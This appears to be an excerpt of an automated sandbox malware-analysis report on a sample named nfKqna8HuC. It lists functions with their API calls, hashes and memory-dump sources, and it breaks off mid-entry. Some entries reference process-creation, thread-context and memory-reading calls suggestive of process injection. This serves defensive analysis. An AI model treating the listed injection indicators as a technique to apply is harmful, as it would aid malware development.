Instruction Fuzzy Hash: F4318DB0604B118FC720DF24E8856D7BBE9FF49304F00092EE69A8A250E7716948CF96

Function 0064395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00643973

Part of subcall function 006481C2: __NMSG_WRITE.LIBCMT ref: 006481E9
Part of subcall function 006481C2: __NMSG_WRITE.LIBCMT ref: 006481F3

__NMSG_WRITE.LIBCMT ref: 0064397A

Part of subcall function 0064821F: GetModuleFileNameW.KERNEL32(00000000,006E0312,00000104,00000000,00000001,00000000), ref: 006482B1
Part of subcall function 0064821F: ___crtMessageBoxW.LIBCMT ref: 0064835F

Part of subcall function 00641145: ___crtCorExitProcess.LIBCMT ref: 0064114B
Part of subcall function 00641145: ExitProcess.KERNEL32 ref: 00641154

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

RtlAllocateHeap.NTDLL(01260000,00000000,00000001,00000001,00000000,?,?,0063F507,?,0000000E), ref: 0064399F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3a5aa6866305e84fef53305256e9e2b7ffd8382d560159a48cc5cb7894167779
Instruction ID: db68639ced7a010e6d24b93cc31b85accf1dcf7bb74f22ee48e539a6637b1649
Opcode Fuzzy Hash: 3a5aa6866305e84fef53305256e9e2b7ffd8382d560159a48cc5cb7894167779
Instruction Fuzzy Hash: 0B0192313453619EE7613B74DC86A6E238B9F82760F21102AF5059B382EBF49D4186A4

Function 0066C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0066C385,?,?,?,?,?,00000004), ref: 0066C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0066C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0066C708
CloseHandle.KERNEL32(00000000,?,0066C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0066C70F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 488ed37106b93a7ebfa8f0a0ce799b7c3711ca340d4ba6c4279938c2b7f521d3
Instruction ID: 537015a686a47e623370e35a4ffb72b38940829ff4c7e148b1ffd84257cdc857
Opcode Fuzzy Hash: 488ed37106b93a7ebfa8f0a0ce799b7c3711ca340d4ba6c4279938c2b7f521d3
Instruction Fuzzy Hash: 4CE08632240214B7DB212B54AC09FDA7F1AEB06770F104110FB55694E097B139118B98

Function 0066BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0066BB72

Part of subcall function 00641C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00647A85), ref: 00641CB1
Part of subcall function 00641C9D: GetLastError.KERNEL32(00000000,?,00647A85), ref: 00641CC3

_free.LIBCMT ref: 0066BB83
_free.LIBCMT ref: 0066BB95

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: 97c201832ebedce9c74b966717b0424f02712482113648a4c1a62b486d42bed7
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction Fuzzy Hash: 13E0C2A1200701C2CB206538AE84EF313CE0F05310704181DB419EB242CF28F8C085A8

Function 00622322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 006222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006224F1), ref: 00622303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006225A1
CoInitialize.OLE32(00000000), ref: 00622618
CloseHandle.KERNEL32(00000000), ref: 0069503A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: d0bfe9926355c3e49bbf8efc04e4177ed4adc1e94ea74529e0ad0dba18d18e70
Instruction ID: 974229ab5689e4e82fc6ab052e4de6abad19fbf96f0194229ecc2beb237fbf71
Opcode Fuzzy Hash: d0bfe9926355c3e49bbf8efc04e4177ed4adc1e94ea74529e0ad0dba18d18e70
Instruction Fuzzy Hash: 2971AEB49113C58F8704EF6AACD0499BBA7BB9B340790612ED219CF7B1DB304684EF59

Function 0066BBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0066BC18

Strings

EA06, xrefs: 0066BC46

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: dd0e60154d53b503212399c832cfaebe371bc9680e839c62812011679acdb419
Instruction ID: 19c6482a9161d655954e49b2ca9f10d1de828a321065c92d98e178c210eb9f43
Opcode Fuzzy Hash: dd0e60154d53b503212399c832cfaebe371bc9680e839c62812011679acdb419
Instruction Fuzzy Hash: 9301B9719042187EDB58C798C856FEDBBF89B15301F00455EF552D6281E574A7048B60

Function 00623A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00623A73

Part of subcall function 00641405: __lock.LIBCMT ref: 0064140B

Part of subcall function 00623ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00623AF3
Part of subcall function 00623ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00623B08

Part of subcall function 00623D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00623AA3,?), ref: 00623D45
Part of subcall function 00623D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00623AA3,?), ref: 00623D57
Part of subcall function 00623D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,006E1148,006E1130,?,?,?,?,00623AA3,?), ref: 00623DC8
Part of subcall function 00623D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00623AA3,?), ref: 00623E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00623AB3

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: bf510fe456df6c281039239aa90cbd8e02c52f08a21e967ffafd2019ae38850f
Instruction ID: 14b570cc02cacc2b66ede57d9f283e1e4e3afbf4f0495988cbb535f9c37716b6
Opcode Fuzzy Hash: bf510fe456df6c281039239aa90cbd8e02c52f08a21e967ffafd2019ae38850f
Instruction Fuzzy Hash: CB11C0719043919BC740EF25E88594ABBEBEF96310F00591EF5858B2A1DB709684CF96

Function 0064E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0064EA29
__close_nolock.LIBCMT ref: 0064EA42

Part of subcall function 00647BDA: __getptd_noexit.LIBCMT ref: 00647BDA

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 7a5a2ed653f856a35dfb4e5431ee2f4b7b820912d3c601209c11a8c3298a69bb
Instruction ID: cfdd95df6369772dcb73f08fb98c872857fa3848b14b8f5d3604966a37320fe2
Opcode Fuzzy Hash: 7a5a2ed653f856a35dfb4e5431ee2f4b7b820912d3c601209c11a8c3298a69bb
Instruction Fuzzy Hash: 7311A572809650DED751BFA4C8813587A63BF82331F264748E4315F2E3CBB58D8187A9

Function 0063F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0064395C: __FF_MSGBANNER.LIBCMT ref: 00643973
Part of subcall function 0064395C: __NMSG_WRITE.LIBCMT ref: 0064397A
Part of subcall function 0064395C: RtlAllocateHeap.NTDLL(01260000,00000000,00000001,00000001,00000000,?,?,0063F507,?,0000000E), ref: 0064399F

std::exception::exception.LIBCMT ref: 0063F51E
__CxxThrowException@8.LIBCMT ref: 0063F533

Part of subcall function 00646805: RaiseException.KERNEL32(?,?,0000000E,006D6A30,?,?,?,0063F538,0000000E,006D6A30,?,00000001), ref: 00646856

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: e0832a7a26e9be9ac3d1076713b97b0ee5b56a37c2fb87053b55fd7d68038123
Instruction ID: eb97bd4f7981a5efd3482d087c43f6cb68bd6d2bd6e06ee88d271061816cea4b
Opcode Fuzzy Hash: e0832a7a26e9be9ac3d1076713b97b0ee5b56a37c2fb87053b55fd7d68038123
Instruction Fuzzy Hash: E3F0C83150421E67D744BF98DC019DE7BEF9F02364F60402AFA09D2692DBB0DA4086EA

Function 00643839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00643868
__lock_file.LIBCMT ref: 00643889

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: a3e31e6d0d1fafc7c647bbd2f376f1eb7d0fbc1ded645c48cf4451cfb29c96ac
Instruction ID: dfd37228428f148ad6780e2971859347c8738b64a785ebf1b66ef86d25f0dc00
Opcode Fuzzy Hash: a3e31e6d0d1fafc7c647bbd2f376f1eb7d0fbc1ded645c48cf4451cfb29c96ac
Instruction Fuzzy Hash: 8C017C71800219EECF66AFA5CC029DEBB63AF81320F15822DF824563A1D7318B61DB95

Function 006435E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

__lock_file.LIBCMT ref: 00643629

Part of subcall function 00644E1C: __lock.LIBCMT ref: 00644E3F

__fclose_nolock.LIBCMT ref: 00643634

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 60308c76350ebe99f04ecf122af138fd9867531f30f4a46e6d15b1b9f3cd679e
Instruction ID: 74a9e3bd3965e9c125d077b222c049d76c2be113ed72160e0f7b264489437206
Opcode Fuzzy Hash: 60308c76350ebe99f04ecf122af138fd9867531f30f4a46e6d15b1b9f3cd679e
Instruction Fuzzy Hash: 3EF09071801625AADB517F65C8027AE7AA36F42330F26810DF425AB3C1CB788A019B5A

Function 014DDC1D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014DE44D
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014DE471
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014DE493

Memory Dump Source

Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: 2325bc0c3f658259fa35395c5b6fbe48ee4d5d922e744d34d22a9f956fd7a062
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: C312CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 00642957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00642A0B

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: e6b15e57d878af84ff71fc189714c4fb0fba44f058bbd2f6874d20b0836c8108
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: B8419271600707AFDB288EAAC8A05AE7BA7AF85360B74852DF855C7340EB71DD818B44

Function 0063ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0063EDC7

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: c1cd7d5de5d401efb5eea647d05ca9a930ac62803718d9e8820bbe43213deb4c
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 2D31B574A001059BD718DF58C4909A9FBA6FF49340F6486A5E40ADF396DB32EDC2CBE0

Function 00699A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00699A80

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 52f8438f41f9486888d92898908f961c1fc6bc3fdda1b87662f110f893ad8558
Instruction ID: d7271179794e36846c1884ac5e6de758d3661545510079d570263c25ec6b4857
Opcode Fuzzy Hash: 52f8438f41f9486888d92898908f961c1fc6bc3fdda1b87662f110f893ad8558
Instruction Fuzzy Hash: 27417E705046118FEB24CF18C484B1ABBE2BF45314F1989ACE99A4B762C776F846CF92

Function 0064ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 0718f5e1a5540f167a2d882c854f38a3e97cf9afe5d0f2c9b46201b7d8a152ff
Instruction ID: 0a3bb492982db755c69dc0cbcb83a00dc6b50e4edc1e85767a574c21af6bbb0d
Opcode Fuzzy Hash: 0718f5e1a5540f167a2d882c854f38a3e97cf9afe5d0f2c9b46201b7d8a152ff
Instruction Fuzzy Hash: FB216F72C04A509FD7627FA8CC853587A63BF82335F260648F4714F2E2DBB58D018BA9

Function 006241A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00624214: FreeLibrary.KERNEL32(00000000,?), ref: 00624247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006239FE,?,00000001), ref: 006241DB

Part of subcall function 00624291: FreeLibrary.KERNEL32(00000000), ref: 006242C4

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: ac99c153198e30e32355ca9a175c20a4636959a4d9afd14d0efa8a272c978f7b
Instruction ID: 602f0a5d6f655d0aefd1995e5530478d067002b70b166840d5e69c334baa959d
Opcode Fuzzy Hash: ac99c153198e30e32355ca9a175c20a4636959a4d9afd14d0efa8a272c978f7b
Instruction Fuzzy Hash: A011C131600626EACB14BB71EC16FAE77EB9F40700F10842DB596AA181DE719B019F68

Function 00699B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00699B51

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 13d566f4de22b18ae12cfa20f33568f684815f62ac8b7809fed63e4603a4de92
Instruction ID: 4c25e04b54ef8a815cb50902929fa71a52787675ab04653677eb051ad64fbd6c
Opcode Fuzzy Hash: 13d566f4de22b18ae12cfa20f33568f684815f62ac8b7809fed63e4603a4de92
Instruction Fuzzy Hash: 6E2127705086018FEB64DF64C454B5ABBE2BF85304F14496CE59A4B721C731F84ACF96

Function 0064AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0064AFC0

Part of subcall function 00647BDA: __getptd_noexit.LIBCMT ref: 00647BDA

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 8e6529ee29cd69890a622d5dc241fc0b5f52238bfe3ac3d9d592a9ec9a0573b4
Instruction ID: be7269a3dcb8f4bea4765130ba868c0e245e3ef72b496a2ca19f5261ceb556fe
Opcode Fuzzy Hash: 8e6529ee29cd69890a622d5dc241fc0b5f52238bfe3ac3d9d592a9ec9a0573b4
Instruction Fuzzy Hash: C711C4728046409FD7527FE4C8817993A63AF82732F155748F4304F2E2C7B4CD418BAA

Function 006239DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
